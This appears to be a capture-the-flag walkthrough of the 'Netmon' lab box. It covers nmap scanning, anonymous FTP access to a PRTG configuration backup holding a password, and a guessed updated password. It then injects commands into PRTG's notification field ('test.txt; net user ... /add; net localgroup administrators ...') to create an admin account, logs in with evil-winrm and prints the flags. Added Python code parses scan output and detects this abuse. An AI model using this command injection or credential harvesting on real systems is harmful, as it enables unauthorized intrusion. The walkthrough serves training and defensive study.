Netmon

Last updated 2 years ago


Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command scans the target machine for open ports quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.152 -oN allPorts

  • -sS uses the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scans the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn assumes the host is online and skips host discovery.

  • -n scans without reverse DNS resolution.

  • -oN saves the scan result into a file, in this case the allPorts file.

# Nmap 7.93 scan initiated Wed Nov 23 18:07:22 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.152
Nmap scan report for 10.10.10.152
Host is up (0.061s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

# Nmap done at Wed Nov 23 18:07:41 2022 -- 1 IP address (1 host up) scanned in 20.08 seconds
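
Before typing the second command, the port list can be pulled out of the allPorts file rather than copied by hand. The following Python script is an added example and not part of the original writeup: it parses a constructed copy of the -oN output shown above (with one extra, constructed "filtered" row added to show that only open ports are kept) and builds the follow-up nmap command from it.

```python
import re

# Constructed copy of the allPorts output above (same 13 open ports), plus one
# constructed "filtered" row to show that only state "open" is kept.
ALLPORTS = """\
# Nmap 7.93 scan initiated Wed Nov 23 18:07:22 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.152
Nmap scan report for 10.10.10.152
Host is up (0.061s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp filtered unknown

# Nmap done at Wed Nov 23 18:07:41 2022 -- 1 IP address (1 host up) scanned in 20.08 seconds
"""

# One "PORT STATE SERVICE" row of nmap's normal (-oN) output.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)


def open_ports(scan_text, proto="tcp"):
    """Sorted list of ports in state 'open' for `proto`; 'filtered' and
    'open|filtered' rows are deliberately skipped."""
    ports = set()
    for m in PORT_LINE.finditer(scan_text):
        port, p, state, _service = m.groups()
        if p == proto and state == "open":
            ports.add(int(port))
    return sorted(ports)


def host_from_scan(scan_text):
    """Target as printed in the 'Nmap scan report for ...' line, or None."""
    m = re.search(r"^Nmap scan report for (\S+)", scan_text, re.M)
    return m.group(1) if m else None


def targeted_command(ports, host, outfile="targeted"):
    """Build the follow-up -sC -sV scan over exactly the open ports, as the
    writeup does by hand with the -p list."""
    if not ports:
        raise ValueError("no open ports: nothing to scan in depth")
    plist = ",".join(str(p) for p in ports)
    return f"nmap -sC -sV -p{plist} {host} -oN {outfile}"


if __name__ == "__main__":
    print(targeted_command(open_ports(ALLPORTS), host_from_scan(ALLPORTS)))
```

Running it prints the same targeted command the writeup types next. Keying on the state column rather than on "tcp" alone matters on hosts behind a firewall, where filtered rows would otherwise inflate the -p list.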

Now that we know which ports are open, let's try to obtain the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:

nmap -sC -sV -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 10.10.10.152 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN saves the scan result into a file, in this case the targeted file.

# Nmap 7.93 scan initiated Wed Nov 23 18:08:20 2022 as: nmap -sCV -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 -oN targeted 10.10.10.152
Nmap scan report for 10.10.10.152
Host is up (0.051s latency).

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-23T17:12:34
|_  start_date: 2022-11-23T17:06:50
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 3m10s, deviation: 0s, median: 3m10s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 23 18:09:27 2022 -- 1 IP address (1 host up) scanned in 67.02 seconds

Exploitation

As we can see, anonymous login is allowed on the FTP server.

ftp 10.10.10.152

Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:alfa8sa): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

The FTP root exposes the entire filesystem of the Windows machine.

ftp> ls

229 Entering Extended Passive Mode (|||49722|)
150 Opening ASCII mode data connection.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
02-25-19  10:49PM       <DIR>          Windows
226 Transfer complete.

If we look inside the Users/Public directory, we can see the user flag.

ftp> ls Users/Public/

229 Entering Extended Passive Mode (|||49873|)
150 Opening ASCII mode data connection.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
11-24-22  12:35PM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.

Let's download it to our local machine and read it.

ftp> cd Users/Public/

ftp> get user.txt

ftp> exit

cat user.txt

e167266245f694804d5a826f16adf7d9

Privilege Escalation

If we take a look at the website, we'll see a PRTG Network Monitor. Its data directory is also reachable through the FTP server, so let's look inside it.

ftp> cd ProgramData/Paessler/PRTG\ Network\ Monitor

ftp> ls

229 Entering Extended Passive Mode (|||50513|)
125 Data connection already open; Transfer starting.
12-15-21  07:23AM       <DIR>          Configuration Auto-Backups
11-24-22  12:35PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
11-24-22  12:35PM       <DIR>          Logs (Web Server)
11-24-22  12:40PM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
11-24-22  01:16PM              1679623 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.

Let's download the PRTG Configuration.old.bak file.

ftp> get "PRTG Configuration.old.bak"

The file contains the PrTg@dmin2018 password for the prtgadmin user.

cat PRTG\ Configuration.old.bak | grep prtgadmin -A 1

              <!-- User: prtgadmin -->
              PrTg@dmin2018
--
                  prtgadmin
                </login>

But we can't log in with these credentials.

As the file had the .old.bak extension, this may be an old password. If we try PrTg@dmin2019 instead, we'll be able to log in.

There is a vulnerability in PRTG Network Monitor which allows an administrator to run commands on the underlying system through notifications. Go to Setup, Notifications, Add new notification, then go to the Execute Program section of the notification, select the .ps1 option, and run the following command, which will create the test user and add it to the Administrators group.

test.txt; net user test alfa8sa1234! /add; net localgroup administrators test /add

To run the command, click on Send test notification.

Then, hit OK.

Now, check that the test user has been created.

cme smb 10.10.10.152 -u "test" -p 'alfa8sa1234!'

SMB         10.10.10.152    445    NETMON           [*] Windows Server 2016 Standard 14393 x64 (name:NETMON) (domain:netmon) (signing:False) (SMBv1:True)
SMB         10.10.10.152    445    NETMON           [+] netmon\test:alfa8sa1234! (Pwn3d!)
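
From the defender's side, the notification abuse above leaves a recognisable trail: the PRTG core service spawning net.exe to create a user, and the Security log recording an account creation (event 4720) followed within seconds by a membership change on Administrators (event 4732). The following Python code is an added example, not part of the original writeup. The event records are constructed and simplified, the service image name "PRTG Server.exe" and the PRTG -> powershell.exe -> net.exe process chain are assumptions, and the password in the sample command line is a placeholder.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class Event:
    """Minimal normalised log record; source is "sysmon" or "security"."""
    ts: datetime
    source: str
    event_id: int
    fields: dict = field(default_factory=dict)


# The two account-manipulation command lines the notification ran.
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)
NET_ADMIN_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)
# Assumption: the PRTG core service image is "PRTG Server.exe".
PRTG_SERVICE = re.compile(r"\\PRTG Server\.exe$", re.I)

T0 = datetime(2022, 11, 24, 13, 20, 0)

# Constructed, simplified sample events (not records taken from the box).
# The PRTG -> powershell.exe -> net.exe chain is an assumption about how the
# "Execute Program" notification is launched.
SAMPLE_EVENTS = [
    Event(T0, "sysmon", 1, {"ProcessGuid": "A", "ParentProcessGuid": "svc",
          "Image": r"C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe",
          "CommandLine": '"PRTG Server.exe"'}),
    Event(T0 + timedelta(seconds=1), "sysmon", 1, {"ProcessGuid": "B", "ParentProcessGuid": "A",
          "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "CommandLine": "powershell.exe -File example.ps1"}),
    Event(T0 + timedelta(seconds=2), "sysmon", 1, {"ProcessGuid": "C", "ParentProcessGuid": "B",
          "Image": r"C:\Windows\System32\net.exe",
          "CommandLine": "net user test Placeh0lder-pw! /add"}),
    Event(T0 + timedelta(seconds=3), "sysmon", 1, {"ProcessGuid": "D", "ParentProcessGuid": "B",
          "Image": r"C:\Windows\System32\net.exe",
          "CommandLine": "net localgroup administrators test /add"}),
    # Control: the same command from an interactive console, not under PRTG.
    Event(T0 + timedelta(hours=2), "sysmon", 1, {"ProcessGuid": "E", "ParentProcessGuid": "console",
          "Image": r"C:\Windows\System32\net.exe",
          "CommandLine": "net user svc_backup Placeh0lder-pw! /add"}),
    Event(T0 + timedelta(seconds=2), "security", 4720, {"TargetUserName": "test"}),
    Event(T0 + timedelta(seconds=3), "security", 4732,
          {"TargetUserName": "Administrators", "MemberName": "NETMON\\test"}),
    Event(T0 + timedelta(hours=2), "security", 4720, {"TargetUserName": "svc_backup"}),
]


def descends_from_prtg(event, by_guid, max_depth=10):
    """Walk the Sysmon parent chain; True if any ancestor is the PRTG service."""
    guid = event.fields.get("ParentProcessGuid")
    for _ in range(max_depth):
        parent = by_guid.get(guid)
        if parent is None:
            return False
        if PRTG_SERVICE.search(parent.fields.get("Image", "")):
            return True
        guid = parent.fields.get("ParentProcessGuid")
    return False


def prtg_spawned_account_change(events):
    """Sysmon ID 1 records whose command line creates a local user or grants
    local admin and whose ancestry includes the PRTG service.
    Returns (timestamp, account, command line) tuples."""
    sysmon = [e for e in events if e.source == "sysmon" and e.event_id == 1]
    by_guid = {e.fields["ProcessGuid"]: e for e in sysmon}
    findings = []
    for e in sysmon:
        cmd = e.fields.get("CommandLine", "")
        m = NET_USER_ADD.search(cmd) or NET_ADMIN_ADD.search(cmd)
        if m and descends_from_prtg(e, by_guid):
            findings.append((e.ts, m.group(1).lower(), cmd))
    return findings


def new_account_made_admin(events, window=timedelta(minutes=5)):
    """Security 4720 (account created) followed within `window` by 4732
    (member added to a local group) where the group is Administrators.
    Simplification: real 4732 records identify the member by SID, so a
    production rule resolves MemberSid first; here MemberName is already set."""
    created = {}
    findings = []
    security = sorted((e for e in events if e.source == "security"), key=lambda e: e.ts)
    for e in security:
        if e.event_id == 4720:
            created[e.fields["TargetUserName"].lower()] = e.ts
        elif e.event_id == 4732 and e.fields.get("TargetUserName", "").lower() == "administrators":
            member = e.fields.get("MemberName", "").split("\\")[-1].lower()
            if member in created and e.ts - created[member] <= window:
                findings.append((member, created[member], e.ts))
    return findings


if __name__ == "__main__":
    for f in prtg_spawned_account_change(SAMPLE_EVENTS) + new_account_made_admin(SAMPLE_EVENTS):
        print(f)
```

The first rule fires only when the account change descends from the monitoring service, so the console-created svc_backup account in the sample is left alone; the second rule needs no process telemetry at all and catches the same activity from the Security log alone. On the prevention side, the chain in this writeup starts with a configuration backup readable over anonymous FTP and a password that was rotated by incrementing a year, so keeping %programdata%\Paessler out of any FTP root and rotating the prtgadmin credential properly removes the foothold before the notification feature ever matters.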

Now, all we have to do is get a shell as test with evil-winrm, reap the harvest and take the root flag.

evil-winrm -i 10.10.10.152 -u test

Enter Password: alfa8sa1234!

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\test\Documents> whoami
netmon\test
*Evil-WinRM* PS C:\Users\test\Documents> type \users\administrator\desktop\root.txt
75c2ea99cac3ffc3dea2665d9d02009e

As we can see in this article, the PRTG data directory is located at %programdata%\Paessler\PRTG Network Monitor, which is the directory we listed through the FTP server above.